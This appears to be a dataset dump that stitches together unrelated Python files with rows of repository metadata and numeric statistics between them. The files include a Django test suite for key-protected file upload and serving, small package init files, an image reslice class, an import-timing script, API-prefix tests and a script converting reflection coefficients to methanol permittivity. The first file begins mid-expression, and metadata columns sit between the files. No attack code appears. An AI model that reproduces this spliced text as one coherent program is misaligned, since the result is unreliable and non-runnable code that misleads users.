settings.SERVED_PATHS[0], 'pub/file_name')
with open(uploaded_file_path) as f:
self.assertEqual(f.read(), file_content)
# Test we can fetch the newly uploaded file
response = self.client.get("http://testserver/pub/file_name")
self.assertEqual(response.status_code, 200)
finally:
# Delete the files generated by the test
shutil.rmtree(os.path.join(settings.SERVED_PATHS[0], "pub"))
def test_post_empty_file(self):
'''Ensure we accept zero byte files'''
response = self.client.get("http://testserver/api/request_key",
data={"key": settings.MASTER_API_KEY})
self.assertEqual(response.status_code, 200)
# Don't care what the key is, as long as it isn't blank
        self.assertRegexpMatches(response.content, r"\S+")
key = response.content
# Now write a file so we can upload it
file_content = ""
file_root = "/tmp"
tmp_file_name = os.path.join(
file_root,
self.make_temporary_file(file_content))
try:
# Send the file
with open(tmp_file_name) as f:
response = self.client.post(
"http://testserver/file_name",
data={"key": key, "file": f})
self.assertEqual(response.status_code, 200)
# Check the upload worked by reading the file back from its
# uploaded location
uploaded_file_path = os.path.join(
settings.UPLOAD_PATH, key, "file_name")
with open(uploaded_file_path) as f:
self.assertEqual(f.read(), file_content)
# Test we can fetch the newly uploaded file if we present the key
response = self.client.get("http://testserver/file_name",
data={"key": key})
self.assertEqual(response.status_code, 200)
response = self.client.get("http://testserver/file_name")
self.assertNotEqual(response.status_code, 200)
finally:
# Delete the files generated by the test
shutil.rmtree(os.path.join(settings.UPLOAD_PATH, key))
def test_post_no_file(self):
response = self.client.get("http://testserver/api/request_key",
data={"key": settings.MASTER_API_KEY})
self.assertEqual(response.status_code, 200)
# Don't care what the key is, as long as it isn't blank
        self.assertRegexpMatches(response.content, r"\S+")
key = response.content
response = self.client.post(
"http://testserver/file_name", data={"key": key})
self.assertEqual(response.status_code, 500)
def test_post_file_no_key(self):
file_content = "test_post_file_no_key"
file_root = "/tmp"
tmp_file_name = os.path.join(
file_root,
self.make_temporary_file(file_content))
# Try to upload a file without a key.
with open(tmp_file_name) as f:
response = self.client.post(
"http://testserver/file_name", data={"file": f})
self.assertEqual(response.status_code, 500)
# Make sure the file didn't get created.
self.assertFalse(os.path.isfile(
os.path.join(settings.UPLOAD_PATH, "file_name")))
def test_post_file_random_key(self):
key = "%030x" % random.randrange(256 ** 15)
file_content = "test_post_file_random_key"
file_root = "/tmp"
tmp_file_name = os.path.join(
file_root,
self.make_temporary_file(file_content))
# Try to upload a file with a randomly generated key.
with open(tmp_file_name) as f:
response = self.client.post(
"http://testserver/file_name", data={"key": key, "file": f})
self.assertEqual(response.status_code, 500)
# Make sure the file didn't get created.
self.assertFalse(os.path.isfile(
os.path.join(settings.UPLOAD_PATH, key, "file_name")))
def test_api_delete_key(self):
response = self.client.get("http://testserver/api/request_key",
data={"key": settings.MASTER_API_KEY})
self.assertEqual(response.status_code, 200)
# Don't care what the key is, as long as it isn't blank
        self.assertRegexpMatches(response.content, r"\S+")
key = response.content
file_content = "test_api_delete_key"
file_root = "/tmp"
tmp_file_name = os.path.join(
file_root,
self.make_temporary_file(file_content))
with open(tmp_file_name) as f:
response = self.client.post(
"http://testserver/file_name", data={"key": key, "file": f})
self.assertEqual(response.status_code, 200)
self.assertTrue(os.path.isfile(os.path.join(settings.UPLOAD_PATH,
key,
"file_name")))
        # Release the key; the files should be deleted
response = self.client.get("http://testserver/api/delete_key",
data={"key": key})
self.assertEqual(response.status_code, 200)
self.assertFalse(os.path.isfile(
os.path.join(settings.UPLOAD_PATH, key, "file_name")))
        # The key shouldn't work once it has been released
response = self.client.get("http://testserver/file_name",
data={"key": key})
self.assertNotEqual(response.status_code, 200)
class HowtoViewTests(BaseServeViewTest):
def test_no_howtos(self):
with temporary_directory() as serve_root:
settings.SERVED_PATHS = [serve_root.root]
serve_root.make_file(
"build/9/build.tar.bz2", with_buildinfo=True)
response = self.client.get('/build/9/')
self.assertEqual(response.status_code, 200)
self.assertContains(response, 'build.tar.bz2')
def test_howtos_without_license(self):
with temporary_directory() as serve_root:
settings.SERVED_PATHS = [serve_root.root]
serve_root.make_file(
"build/9/build.tar.bz2", with_buildinfo=True)
serve_root.make_file(
"build/9/howto/HOWTO_test.txt", data=".h1 HowTo Test")
response = self.client.get('/build/9/')
self.assertEqual(response.status_code, 200)
self.assertContains(response, 'build.tar.bz2')
def test_howtos_with_license_in_buildinfo(self):
with temporary_directory() as serve_root:
settings.SERVED_PATHS = [serve_root.root]
serve_root.make_file(
"build/9/build.tar.bz2", with_buildinfo=True)
serve_root.make_file(
"build/9/howto/HOWTO_test.txt", data=".h1 HowTo Test",
with_buildinfo=True)
response = self.client.get('/build/9/')
self.assertEqual(response.status_code, 200)
self.assertContains(response, 'howto')
def test_howtos_with_license_in_openeula(self):
with temporary_directory() as serve_root:
settings.SERVED_PATHS = [serve_root.root]
serve_root.make_file(
"build/9/build.tar.bz2", with_buildinfo=True)
serve_root.make_file(
"build/9/howto/HOWTO_test.txt", data=".h1 HowTo Test",
with_buildinfo=False)
serve_root.make_file(
"build/9/howto/OPEN-EULA.txt", with_buildinfo=False)
response = self.client.get('/build/9/')
self.assertEqual(response.status_code, 200)
self.assertContains(response, 'howto')
def test_howtos_howto_dir(self):
with temporary_directory() as serve_root:
settings.SERVED_PATHS = [serve_root.root]
serve_root.make_file(
"build/9/build.tar.bz2", with_buildinfo=True)
serve_root.make_file(
"build/9/howto/HOWTO_releasenotes.txt", data=".h1 HowTo Test")
response = self.client.get('/build/9/howto/')
self.assertEqual(response.status_code, 200)
self.assertContains(response, 'HowTo Test')
def test_howtos_product_dir(self):
with temporary_directory() as serve_root:
settings.SERVED_PATHS = [serve_root.root]
serve_root.make_file(
"build/9/build.tar.bz2", with_buildinfo=True)
serve_root.make_file(
"build/9/target/product/panda/howto/HOWTO_releasenotes.txt",
data=".h1 HowTo Test")
response = self.client.get('/build/9/target/product/panda/howto/')
self.assertEqual(response.status_code, 200)
self.assertContains(response, 'HowTo Test')
class FileViewTests(BaseServeViewTest):
def test_static_file(self):
with temporary_directory() as serve_root:
settings.SERVED_PATHS = [serve_root.root]
serve_root.make_file("MD5SUM")
serve_root.make_file(
"BUILD-INFO.txt",
data=("Format-Version: 2.0\n\n"
"Files-Pattern: MD5SUM\n"
"License-Type: open\n"))
response = self.client.get('/MD5SUM')
self.assertEqual(response.status_code, 200)
class ViewHelpersTests(BaseServeViewTest):
def test_auth_group_error(self):
groups = ["linaro", "batman", "catwoman", "joker"]
request = mock.Mock()
request.path = "mock_path"
response = views.group_auth_failed_response(request, groups)
self.assertIsNotNone(response)
self.assertTrue(isinstance(response, HttpResponse))
self.assertContains(
response,
"You need to be the member of one of the linaro batman, catwoman "
"or joker groups",
status_code=403)
if __name__ == '__main__':
unittest.main()
| 41.756158
| 79
| 0.632887
| 6,305
| 50,859
| 4.906423
| 0.074544
| 0.048489
| 0.045967
| 0.045482
| 0.82738
| 0.805269
| 0.776241
| 0.753451
| 0.733603
| 0.715533
| 0
| 0.010426
| 0.260721
| 50,859
| 1,217
| 80
| 41.790468
| 0.812335
| 0.110738
| 0
| 0.655568
| 0
| 0
| 0.14177
| 0.050555
| 0
| 0
| 0
| 0
| 0.198622
| 1
| 0.101033
| false
| 0
| 0.026406
| 0
| 0.135476
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
c84f491e3f5f59f24f8adc43bd18fa95d8b8c039
| 145
|
py
|
Python
|
httoop/codecs/text/__init__.py
|
spaceone/httoop
|
99f5f51a6ebab4bfdfd02d3705a0bffb5379b4a9
|
[
"MIT"
] | 13
|
2015-01-07T19:39:02.000Z
|
2021-07-12T21:09:28.000Z
|
httoop/codecs/text/__init__.py
|
spaceone/httoop
|
99f5f51a6ebab4bfdfd02d3705a0bffb5379b4a9
|
[
"MIT"
] | 9
|
2015-06-14T11:37:26.000Z
|
2020-12-11T09:12:30.000Z
|
httoop/codecs/text/__init__.py
|
spaceone/httoop
|
99f5f51a6ebab4bfdfd02d3705a0bffb5379b4a9
|
[
"MIT"
] | 10
|
2015-05-28T05:51:46.000Z
|
2021-12-29T20:36:15.000Z
|
# -*- coding: utf-8 -*-
from httoop.codecs.text.html import HTML
from httoop.codecs.text.plain import PlainText
__all__ = ['PlainText', 'HTML']
| 24.166667
| 46
| 0.717241
| 20
| 145
| 5
| 0.6
| 0.2
| 0.32
| 0.4
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.007874
| 0.124138
| 145
| 5
| 47
| 29
| 0.779528
| 0.144828
| 0
| 0
| 0
| 0
| 0.106557
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
c0d240dacd684717edd018a2ddf32401d5f425b4
| 144
|
py
|
Python
|
resource/__init__.py
|
mukangt/InvoiceTool
|
f8b5fbbbc398cc7be35609e2f0ed68d34371e87a
|
[
"MIT"
] | null | null | null |
resource/__init__.py
|
mukangt/InvoiceTool
|
f8b5fbbbc398cc7be35609e2f0ed68d34371e87a
|
[
"MIT"
] | null | null | null |
resource/__init__.py
|
mukangt/InvoiceTool
|
f8b5fbbbc398cc7be35609e2f0ed68d34371e87a
|
[
"MIT"
] | null | null | null |
'''
Author: mukangt
Date: 2021-08-04 11:06:49
LastEditors: mukangt
LastEditTime: 2021-08-04 11:07:43
Description:
'''
from . import Rc_resource
| 18
| 33
| 0.743056
| 23
| 144
| 4.608696
| 0.782609
| 0.113208
| 0.150943
| 0.188679
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.220472
| 0.118056
| 144
| 8
| 34
| 18
| 0.614173
| 0.756944
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
2385120ba9e5809dcd4a2f0a8d0ec50a70b4042a
| 212
|
py
|
Python
|
mri_works/NodeEditor/modules/Tools/ImageTransformation.py
|
montigno/mri_works
|
8ec6ff1500aa34d3540e44e4b0148023cf821f61
|
[
"CECILL-B"
] | 2
|
2020-08-20T21:00:53.000Z
|
2021-08-16T15:28:51.000Z
|
mri_works/NodeEditor/modules/Tools/ImageTransformation.py
|
montigno/mri_works
|
8ec6ff1500aa34d3540e44e4b0148023cf821f61
|
[
"CECILL-B"
] | 3
|
2020-09-24T06:50:43.000Z
|
2020-12-15T11:02:04.000Z
|
mri_works/NodeEditor/modules/Tools/ImageTransformation.py
|
montigno/mri_works
|
8ec6ff1500aa34d3540e44e4b0148023cf821f61
|
[
"CECILL-B"
] | 1
|
2020-08-20T21:00:59.000Z
|
2020-08-20T21:00:59.000Z
|
class reslice():
    def __init__(self, image=[[0.0]], order=[0]):
        import numpy as np
        # Reorder the image axes according to 'order' (numpy transpose).
        # Note: this assignment shadows the image() accessor below on the
        # instance; the surrounding node-editor framework appears to rely
        # on the attribute and annotation rather than calling the method.
        self.image = np.transpose(image, order)
    def image(self: 'array_float'):
        return self.image
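# Usage sketch (illustrative, not part of the module): reorder a
# (z, y, x) volume into (x, y, z) order:
#   vol = reslice(image=np.zeros((4, 5, 6)), order=[2, 1, 0])
#   vol.image.shape  # -> (6, 5, 4)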
| 26.5
| 50
| 0.580189
| 28
| 212
| 4.214286
| 0.571429
| 0.228814
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.019608
| 0.278302
| 212
| 7
| 51
| 30.285714
| 0.751634
| 0
| 0
| 0
| 0
| 0
| 0.053659
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.166667
| 0.166667
| 0.833333
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 6
|
23f65cddf985d129e187de5ca1332ed6001bf2d3
| 16
|
py
|
Python
|
Metrics/variation_of_information.py
|
Joevaen/Scikit-image_On_CT
|
e3bf0eeadc50691041b4b7c44a19d07546a85001
|
[
"Apache-2.0"
] | null | null | null |
Metrics/variation_of_information.py
|
Joevaen/Scikit-image_On_CT
|
e3bf0eeadc50691041b4b7c44a19d07546a85001
|
[
"Apache-2.0"
] | null | null | null |
Metrics/variation_of_information.py
|
Joevaen/Scikit-image_On_CT
|
e3bf0eeadc50691041b4b7c44a19d07546a85001
|
[
"Apache-2.0"
] | null | null | null |
# Return the symmetric conditional entropy associated with VI (variation of information).
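# For reference, the variation of information between clusterings X and Y
# is the sum of the two conditional entropies (standard definition):
#   VI(X; Y) = H(X|Y) + H(Y|X)
# which is presumably the symmetric quantity the comment above refers to.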
| 16
| 16
| 0.8125
| 1
| 16
| 13
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.0625
| 16
| 1
| 16
| 16
| 0.866667
| 0.875
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
9b03e7dc344f57ee90b10e57ca66f05b0b984232
| 448
|
py
|
Python
|
test_frame/other_tests/test_import_time.py
|
DJMIN/funboost
|
7570ca2909bb0b44a1080f5f98aa96c86d3da9d4
|
[
"Apache-2.0"
] | 333
|
2019-08-08T10:25:27.000Z
|
2022-03-30T07:32:04.000Z
|
test_frame/other_tests/test_import_time.py
|
mooti-barry/funboost
|
2cd9530e2c4e5a52fc921070d243d402adbc3a0e
|
[
"Apache-2.0"
] | 38
|
2020-04-24T01:47:51.000Z
|
2021-12-20T07:22:15.000Z
|
test_frame/other_tests/test_import_time.py
|
mooti-barry/funboost
|
2cd9530e2c4e5a52fc921070d243d402adbc3a0e
|
[
"Apache-2.0"
] | 84
|
2019-08-09T11:51:14.000Z
|
2022-03-02T06:29:09.000Z
|
# Print a timestamp after each import to see which heavyweight
# dependencies dominate start-up time.
import datetime
print(1, datetime.datetime.now())
import apscheduler
print(2, datetime.datetime.now())
import gevent
print(3, datetime.datetime.now())
import eventlet
print(4, datetime.datetime.now())
import asyncio
print(5, datetime.datetime.now())
import threading
print(6, datetime.datetime.now())
import pymongo
print(7, datetime.datetime.now())
import redis
print(8, datetime.datetime.now())
import pysnooper
print(9, datetime.datetime.now())
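# To report elapsed time per import rather than raw timestamps, each
# import could be wrapped like this (sketch, not part of the original):
#   import time
#   t0 = time.perf_counter()
#   import pymongo
#   print('pymongo import took %.3fs' % (time.perf_counter() - t0))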
| 16
| 32
| 0.779018
| 63
| 448
| 5.539683
| 0.333333
| 0.412607
| 0.489971
| 0.573066
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.021845
| 0.080357
| 448
| 28
| 33
| 16
| 0.825243
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0.5
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
|
0
| 6
|
f1d2893fa115eecb78df0e1f60881f2cba36b30d
| 1,151
|
py
|
Python
|
tests/test_unit/test_api_prefixes.py
|
WinaZar/restdoctor
|
2ea2db69228e5425805a2b17160f54cda077aa46
|
[
"MIT"
] | 20
|
2020-09-28T17:54:26.000Z
|
2022-02-16T21:35:09.000Z
|
tests/test_unit/test_api_prefixes.py
|
WinaZar/restdoctor
|
2ea2db69228e5425805a2b17160f54cda077aa46
|
[
"MIT"
] | 32
|
2020-10-04T17:26:31.000Z
|
2022-03-29T01:19:14.000Z
|
tests/test_unit/test_api_prefixes.py
|
pashaandsik/restdoctor
|
2465039729b31420518ac0f047dd289d8c84dfa3
|
[
"MIT"
] | 19
|
2020-10-01T16:54:14.000Z
|
2022-01-18T14:41:53.000Z
|
import pytest
from restdoctor.utils.api_prefix import get_api_prefixes, get_api_path_prefixes
@pytest.mark.parametrize(
'api_prefixes,default,expected_result',
(
('/prefix', None, ('/prefix',)),
(('/prefix',), None, ('/prefix',)),
(None, None, ()),
(None, '/prefix', ('/prefix',)),
(('/prefix1', '/prefix2'), None, ('/prefix1', '/prefix2')),
),
)
def test_get_api_prefixes_success_case(api_prefixes, default, expected_result, settings):
settings.API_PREFIXES = api_prefixes
result = get_api_prefixes(default=default)
assert result == expected_result
@pytest.mark.parametrize(
'api_prefixes,default,expected_result',
(
('/prefix', None, ('prefix/',)),
(('/prefix',), None, ('prefix/',)),
(None, None, ()),
(None, '/prefix', ('prefix/',)),
(('/prefix1', '/prefix2'), None, ('prefix1/', 'prefix2/')),
),
)
def test_get_api_path_prefixes_success_case(api_prefixes, default, expected_result, settings):
settings.API_PREFIXES = api_prefixes
result = get_api_path_prefixes(default=default)
assert result == expected_result
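# The expected tuples above pin down the normalisation rule: a leading
# slash becomes a trailing one. A sketch of that transformation (assumed,
# not the library's actual code):
#   def _to_path_prefix(prefix):
#       return prefix.strip('/') + '/'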
| 30.289474
| 94
| 0.632493
| 121
| 1,151
| 5.719008
| 0.198347
| 0.174855
| 0.130058
| 0.150289
| 0.875723
| 0.875723
| 0.875723
| 0.736994
| 0.736994
| 0.736994
| 0
| 0.008556
| 0.187663
| 1,151
| 37
| 95
| 31.108108
| 0.731551
| 0
| 0
| 0.4
| 0
| 0
| 0.191138
| 0.062554
| 0
| 0
| 0
| 0
| 0.066667
| 1
| 0.066667
| false
| 0
| 0.066667
| 0
| 0.133333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
f1e50045e62fd9cb5dc74f5b0c6f1656b7b9e524
| 6,331
|
py
|
Python
|
PyOECPv0.5.0/Examples/Example1-Methanol/script.py
|
tyoon124/PyOECP
|
2e37b92201ff92c10ae7f79e7cda209a554f9d77
|
[
"BSD-3-Clause"
] | null | null | null |
PyOECPv0.5.0/Examples/Example1-Methanol/script.py
|
tyoon124/PyOECP
|
2e37b92201ff92c10ae7f79e7cda209a554f9d77
|
[
"BSD-3-Clause"
] | null | null | null |
PyOECPv0.5.0/Examples/Example1-Methanol/script.py
|
tyoon124/PyOECP
|
2e37b92201ff92c10ae7f79e7cda209a554f9d77
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Jun 11 23:41:29 2021
"""
from PyOECP import References
from PyOECP import Transform
import matplotlib.pyplot as plt
import numpy as np
''' Example 1 Methanol
This script tries to convert the reflection coefficients from VNAs.
The data files and VNAs are as follows.
VNA
Short: S11Short.csv
Open: S11Open.csv
Acetone: S11Acetone.csv
Water: S11Water.csv
Methanol: S11Methanol.csv
'''
''' 1.1 Low Frequency Data '''
T = 25
address = 'data/low/'
S11r0 = References.Parser(address + 'S11Short.csv')
S11r1 = References.Parser(address + 'S11Open.csv')
S11r2 = References.Parser(address + 'S11Water.csv')
S11r3 = References.Parser(address + 'S11Acetone.csv')
S11m = References.Parser(address + 'S11Methanol.csv')
frequency = S11r1[:,0]
TransformModel = Transform.Marsland(frequency,S11m,S11r0,S11r1,S11r2,S11r3,
m2='Open',m3='Water_Kaatze',m4='Acetone_Onimisi',temperature=T,
Window=81,concentrations=[None,None,None,None])
MarslandE = TransformModel.Calculate()
spacing = 10
TransformModel1 = Transform.Stuchly(frequency,S11m,S11r0,S11r1,S11r2,
m1='Short',m2='Open',m3='Water_Kaatze',Window=51)
StuchlyE = TransformModel1.Calculate()
Komarov = Transform.Komarov(frequency, S11m, S11r1, S11r2, S11r3,
'Open','Water_Kaatze','Acetone_Onimisi',
1,3.8,2.1+0*1j,M=50,Window=51)
KomarovE = Komarov.epsilon
fig, (ax1,ax2) = plt.subplots(2,1)
fig.set_size_inches((5,8))
fig.set_dpi(300)
font = {'size':15}
plt.rc('font', **font)
plt.rcParams['font.family'] = 'serif'
'''Let's visualize the data.'''
ax1.semilogx(frequency[::spacing],np.real(MarslandE)[::spacing],'o',
markerfacecolor='None',markeredgecolor='red',
markeredgewidth=1.0,markersize=7,label="$\epsilon'$ (Marsland)")
ax1.semilogx(frequency[::spacing],-np.imag(MarslandE)[::spacing],'o',
markerfacecolor='None',markeredgecolor='blue',
markeredgewidth=1.0,markersize=7,label="$\epsilon''$ (Marsland)")
ax1.semilogx(frequency[::spacing],np.real(StuchlyE)[::spacing],'s',
markerfacecolor='None',markeredgecolor='red',
markeredgewidth=1.0,markersize=7,label="$\epsilon'$ (Stuchly)")
ax1.semilogx(frequency[::spacing],-np.imag(StuchlyE)[::spacing],'s',
markerfacecolor='None',markeredgecolor='blue',
             markeredgewidth=1.0,markersize=7,label="$\epsilon''$ (Stuchly)")
ax1.semilogx(frequency[::spacing],np.real(KomarovE)[::spacing],'^',
markerfacecolor='None',markeredgecolor='red',
markeredgewidth=1.0,markersize=7,label="$\epsilon'$ (Komarov)")
ax1.semilogx(frequency[::spacing],-np.imag(KomarovE)[::spacing],'^',
markerfacecolor='None',markeredgecolor='blue',
             markeredgewidth=1.0,markersize=7,label="$\epsilon''$ (Komarov)")
Theoretical = References.Methanol_Barthel(frequency,temperature=T)['epsilon']
ax1.semilogx(frequency,np.real(Theoretical),color='red',linewidth=1.0,label="$\epsilon'$ (Literature)")
ax1.semilogx(frequency,-np.imag(Theoretical),'--',color='blue',linewidth=1.0,label="$\epsilon''$ (Literature)")
ax1.set_ylabel("$\epsilon$")
ax1.set_ylim([0,50])
ax1.legend(loc='upper right', ncol=2, fontsize='xx-small',edgecolor='k')
ax1.text(-0.25,1,'(a)',transform=ax1.transAxes)
''' 1.2 High Frequency Data '''
address = 'data/high/'
S11r0 = References.Parser(address + 'S11Short.csv')
S11r1 = References.Parser(address + 'S11Open.csv')
S11r2 = References.Parser(address + 'S11Water.csv')
S11r3 = References.Parser(address + 'S11Acetone.csv')
S11m = References.Parser(address + 'S11Methanol.csv')
frequency = S11r1[:,0]
TransformModel = Transform.Marsland(frequency,S11m,S11r0,S11r1,S11r2,S11r3,
m2='Open',m3='Water_Kaatze',m4='Acetone_Onimisi',temperature=T,
Window=101,concentrations=[None,None,None,None])
MarslandE = TransformModel.Calculate()
spacing = 10
TransformModel1 = Transform.Stuchly(frequency,S11m,S11r0,S11r1,S11r2,
m1='Short',m2='Open',m3='Water_Kaatze',Window=51)
StuchlyE = TransformModel1.Calculate()
Komarov = Transform.Komarov(frequency, S11m, S11r1, S11r3, S11r2,
'Open','Acetone_Onimisi','Water_Kaatze',
0.3,0.8,2.1+0*1j,M=50,Window=51)
KomarovE = Komarov.epsilon
Theoretical = References.Methanol_Barthel(frequency,temperature=T)['epsilon']
'''Let's visualize the data.'''
ax2.semilogx(frequency[::spacing],np.real(MarslandE)[::spacing],'o',
markerfacecolor='None',markeredgecolor='red',
markeredgewidth=1.0,markersize=7,label="$\epsilon'$ (Marsland)")
ax2.semilogx(frequency[::spacing],-np.imag(MarslandE)[::spacing],'o',
markerfacecolor='None',markeredgecolor='blue',
markeredgewidth=1.0,markersize=7,label="$\epsilon''$ (Marsland)")
ax2.semilogx(frequency[::spacing],np.real(StuchlyE)[::spacing],'s',
markerfacecolor='None',markeredgecolor='red',
markeredgewidth=1.0,markersize=7,label="$\epsilon'$ (Stuchly)")
ax2.semilogx(frequency[::spacing],-np.imag(StuchlyE)[::spacing],'s',
markerfacecolor='None',markeredgecolor='blue',
             markeredgewidth=1.0,markersize=7,label="$\epsilon''$ (Stuchly)")
ax2.semilogx(frequency[::spacing],np.real(KomarovE)[::spacing],'^',
markerfacecolor='None',markeredgecolor='red',
markeredgewidth=1.0,markersize=7,label="$\epsilon'$ (Komarov)")
ax2.semilogx(frequency[::spacing],-np.imag(KomarovE)[::spacing],'^',
markerfacecolor='None',markeredgecolor='blue',
             markeredgewidth=1.0,markersize=7,label="$\epsilon''$ (Komarov)")
ax2.semilogx(frequency,np.real(Theoretical),color='red',linewidth=1.0,label="$\epsilon'$ (Literature)")
ax2.semilogx(frequency,-np.imag(Theoretical),'--',color='blue',linewidth=1.0,label="$\epsilon''$ (Literature)")
ax2.set_xlabel("frequency [Hz]")
ax2.set_ylabel("$\epsilon$")
ax2.set_ylim([0,50])
ax2.legend(loc='upper right', ncol=2, fontsize='xx-small',edgecolor='k')
ax2.text(-0.25,1,'(b)',transform=ax2.transAxes)
plt.savefig('Figure3.pdf',dpi=300)
| 40.324841
| 111
| 0.664508
| 741
| 6,331
| 5.650472
| 0.215924
| 0.008598
| 0.068784
| 0.074516
| 0.812276
| 0.802723
| 0.800573
| 0.797707
| 0.767136
| 0.767136
| 0
| 0.058548
| 0.155584
| 6,331
| 156
| 112
| 40.583333
| 0.724654
| 0.012478
| 0
| 0.534653
| 0
| 0
| 0.156495
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.039604
| 0
| 0.039604
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
7b0e3abd8ec4265cabc886de2a3a6af99fb501d2
| 124
|
py
|
Python
|
crypy/graph/__init__.py
|
asmodehn/crypy
|
351af6588f110612d5207a5fbb29d51bfa7c3268
|
[
"MIT"
] | 2
|
2019-01-20T14:15:54.000Z
|
2019-07-13T17:20:32.000Z
|
crypy/graph/__init__.py
|
asmodehn/crypy
|
351af6588f110612d5207a5fbb29d51bfa7c3268
|
[
"MIT"
] | 12
|
2019-05-07T09:27:34.000Z
|
2019-06-04T12:36:41.000Z
|
crypy/graph/__init__.py
|
asmodehn/crypy
|
351af6588f110612d5207a5fbb29d51bfa7c3268
|
[
"MIT"
] | null | null | null |
# Provide a way to visualize relationships between currencies/pairs, etc.
# TODO : check networkx
from .basic_term import plot
| 31
| 70
| 0.798387
| 18
| 124
| 5.444444
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.153226
| 124
| 4
| 71
| 31
| 0.933333
| 0.725806
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.25
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
7b3330e9e211c942a307690d85810b771b9e9b68
| 81
|
py
|
Python
|
QUANTAXIS/QASpider/Engine/__init__.py
|
5267/QUANTAXIS
|
c3f38b805939e33309e2da7ea8cb32d245c3edfb
|
[
"MIT"
] | 92
|
2017-03-22T07:27:21.000Z
|
2021-04-04T06:59:26.000Z
|
QUANTAXIS/QASpider/Engine/__init__.py
|
5267/QUANTAXIS
|
c3f38b805939e33309e2da7ea8cb32d245c3edfb
|
[
"MIT"
] | 1
|
2017-03-22T10:57:27.000Z
|
2017-03-22T10:57:33.000Z
|
QUANTAXIS/QASpider/Engine/__init__.py
|
5267/QUANTAXIS
|
c3f38b805939e33309e2da7ea8cb32d245c3edfb
|
[
"MIT"
] | 7
|
2017-03-22T07:27:25.000Z
|
2020-04-28T08:44:03.000Z
|
from .core.engine import CrawlerEngine
from .core.crawler import CrawlerProcess
| 20.25
| 40
| 0.839506
| 10
| 81
| 6.8
| 0.7
| 0.235294
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.111111
| 81
| 3
| 41
| 27
| 0.944444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
